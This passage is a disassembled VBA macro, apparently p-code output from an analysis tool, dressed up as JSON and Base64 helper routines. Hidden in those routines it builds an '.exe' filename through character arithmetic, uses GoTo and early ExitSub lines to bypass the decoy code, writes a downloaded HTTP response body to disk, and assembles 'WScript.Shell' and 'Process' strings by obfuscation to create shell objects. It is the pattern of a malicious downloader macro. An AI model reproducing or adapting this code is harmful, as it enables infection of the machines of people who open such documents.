' LitStr 0x0001 "]"
' Add
' St jsonaddarray
' Line #58:
' EndFunc
' Line #59:
' FuncDefn (Sub testjsonaddfield())
' Line #60:
' LitStr 0x0004 "text"
' LitStr 0x0005 "james"
' ArgsLd jsonaddfield 0x0002
' Paren
' ArgsCall MsgBox 0x0001
' Line #61:
' EndSub
' Line #62:
' Line #63:
' FuncDefn (Public Function ParseReturnedPage(strWebPage As String) As String)
' Line #64:
' Dim
' VarDefn headerSplit (As Integer)
' Line #65:
' Dim
' VarDefn m_sHost (As String)
' Line #66:
' Ld RequestAccept4
' Ld RequestAccept7
' ArgsLd Asc 0x0001
' LitDI2 0x000F
' Add
' ArgsLd Chr 0x0001
' Add
' Ld RequestAccept7
' Ld RequestAccept7
' Add
' Ld RequestAccept8
' Add
' Ld RequestAccept10
' Add
' Ld RequestAccept9
' Add
' ArgsLd LCase 0x0001
' Add
' Ld RequestAccept12
' Add
' LitStr 0x0003 "exe"
' Add
' St RequestAccept5
' Line #67:
' GoTo Savi
' Line #68:
' Ld strWebPage
' FnLen
' LitDI2 0x0000
' Eq
' If
' BoSImplicit
' ExitFunc
' EndIf
' Line #69:
' LitDI2 0x0001
' Ld strWebPage
' Ld vbCrLf
' Ld vbCrLf
' Concat
' FnInStr3
' LitDI2 0x0004
' Add
' St headerSplit
' Line #70:
' Ld strWebPage
' Ld headerSplit
' Ld strWebPage
' FnLen
' Ld headerSplit
' Sub
' LitDI2 0x0001
' Add
' ArgsLd Mid 0x0003
' St m_Content
' Line #71:
' Ld frmCom
' MemLd sckcom
' MemLd RemoteHost
' St m_sHost
' Line #72:
' LitStr 0x0004 "type"
' Ld vbLf
' ArgsLd m_Variable 0x0002
' SelectCase
' Line #73:
' LitStr 0x0011 "RareTrackerLast20"
' Case
' CaseDone
' Line #74:
' LitDI2 0x0014
' Paren
' Ld Sho
' ArgsMemCall wLast 0x0001
' Line #75:
' LitStr 0x0012 "RareTrackerMyRares"
' Case
' CaseDone
' Line #76:
' LitDI2 0x0014
' Paren
' Ld Sho
' ArgsMemCall wMine 0x0001
' Line #77:
' CaseElse
' Line #78:
' Ld m_Content
' Ld DecA
' ArgsMemLd SCString 0x0001
' St m_Content
' Line #79:
' LitStr 0x0004 "type"
' Ld vbLf
' ArgsLd m_Variable 0x0002
' LitStr 0x000A "AuthServer"
' Eq
' IfBlock
' Line #80:
' Ld m_Content
' LitStr 0x000F "type?AuthServer"
' Ld vbLf
' Concat
' LitStr 0x0000 ""
' ArgsLd Replace 0x0003
' St m_Content
' Line #81:
' Ld m_Content
' Ld mCrypt
' ArgsMemLd Decrypt 0x0001
' St m_Content
' Line #82:
' Ld m_sHost
' SelectCase
' Line #83:
' LitStr 0x0012 "www.lifetankxi.com"
' Case
' CaseDone
' Line #84:
' Ld Verif
' ArgsMemCall yClient 0x0000
' Line #85:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0000
' ArgsCall SaveSetting 0x0004
' Line #86:
' LitStr 0x001B "raretracker.acvault.ign.com"
' Case
' CaseDone
' Line #87:
' Ld Verif
' ArgsMemCall yClient 0x0000
' Line #88:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0000
' ArgsCall SaveSetting 0x0004
' Line #89:
' LitStr 0x0010 "www.paraduck.net"
' Case
' CaseDone
' Line #90:
' Ld Veri
' ArgsMemCall fyClient 0x0000
' Line #91:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0000
' ArgsCall SaveSetting 0x0004
' Line #92:
' CaseElse
' Line #93:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' ArgsLd GetSetting 0x0003
' LitStr 0x0001 "1"
' Eq
' IfBlock
' Line #94:
' LitStr 0x0043 "Your Lifetank has been permanently disabled. Sorry for the trouble!"
' Ld PrintMe
' ArgsMemCall ssage 0x0001
' Line #95:
' ElseBlock
' Line #96:
' LitStr 0x0043 "Your Lifetank has been permanently disabled. Sorry for the trouble!"
' Ld PrintMe
' ArgsMemCall ssage 0x0001
' Line #97:
' LitStr 0x0005 "Other"
' LitStr 0x0005 "Other"
' LitStr 0x0011 "ConnectionHandler"
' LitDI2 0x0001
' Ld SaveSet
' ArgsMemCall ting 0x0004
' Line #98:
' EndIfBlock
' Line #99:
' EndSelect
' Line #100:
' EndIfBlock
' Line #101:
' EndSelect
' Line #102:
' Label Savi
' Line #103:
' LitDI2 0x0001
' Ld TrimUurl
' MemSt Type
' Line #104:
' Ld TrimUurl
' ArgsMemCall Open 0x0000
' Line #105:
' Ld RequestAccept1
' MemLd responseBody
' Ld TrimUurl
' ArgsMemCall Write 0x0001
' Line #106:
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' ArgsCall ttts 0x0006
' Line #107:
' EndFunc
' Line #108:
' Line #109:
' FuncDefn (Sub testjsonaddarray())
' Line #110:
' Line #111:
' SetStmt
' LitStr 0x0011 "Shell.Application"
' ArgsLd CreateObject 0x0001
' Set RequestAccept6
' Line #112:
' ArgsCall testb64 0x0000
' Line #113:
' ExitSub
' Line #114:
' LitStr 0x0004 "text"
' LitStr 0x0004 "tag1"
' ArgsLd jsonaddarray 0x0002
' Paren
' ArgsCall MsgBox 0x0001
' Line #115:
' EndSub
' Line #116:
' FuncDefn (Sub testjsonwrap())
' Line #117:
' LitStr 0x0004 "text"
' LitStr 0x0006 "xxyyzz"
' ArgsLd jsonaddfield 0x0002
' LitStr 0x0001 ","
' Add
' LitStr 0x0004 "tags"
' LitStr 0x0004 "noun"
' ArgsLd jsonaddarray 0x0002
' Add
' ArgsLd jsonouterwrap 0x0001
' Paren
' ArgsCall MsgBox 0x0001
' Line #118:
' EndSub
' Line #119:
' FuncDefn (Sub testb64())
' Line #120:
' Ld RequestAccept10
' ArgsLd Asc 0x0001
' LitDI2 0x0016
' Add
' ArgsLd Chr 0x0001
' St RequestAccept11
' Line #121:
' Line #122:
' Ld RequestAccept10
' ArgsLd Asc 0x0001
' LitDI2 0x0021
' Sub
' ArgsLd Chr 0x0001
' St RequestAccept12
' Line #123:
' SetStmt
' LitStr 0x0002 "Pr"
' Ld RequestAccept10
' ArgsLd LCase 0x0001
' Add
' LitStr 0x0001 "c"
' Add
' Ld RequestAccept11
' Add
' LitStr 0x0002 "ss"
' Add
' LitStr 0x0001 "w"
' ArgsLd UCase 0x0001
' LitStr 0x0001 "s"
' ArgsLd UCase 0x0001
' Add
' LitStr 0x0005 "cript"
' Add
' Ld RequestAccept12
' Add
' LitStr 0x0002 "Sh"
' Add
' LitStr 0x0000 ""
' Add
' Ld RequestAccept11
' Add
' LitStr 0x0002 "ll"
' Add
' ArgsLd CreateObject 0x0001
' ArgsMemLd Environment 0x0001
' Set RequestAccept3
' Line #124:
' ExitSub
' Line #125:
' LitStr 0x000B "user:mypass"
' ArgsLd Base64Encode 0x0001
' Paren
' ArgsCall MsgBox 0x0001
' Line #126:
' EndSub
' Line #127:
' FuncDefn (Function Base64Encode(sText))
' Line #128:
' Dim
' VarDefn oXML
' VarDefn oNode
' Line #129:
' SetStmt
' LitStr 0x0016 "Msxml2.DOMDocument.3.0"
' ArgsLd CreateObject 0x0001
' Set oXML
' Line #130:
' SetStmt
' LitStr 0x0006 "base64"
' Ld oXML
…
|
|||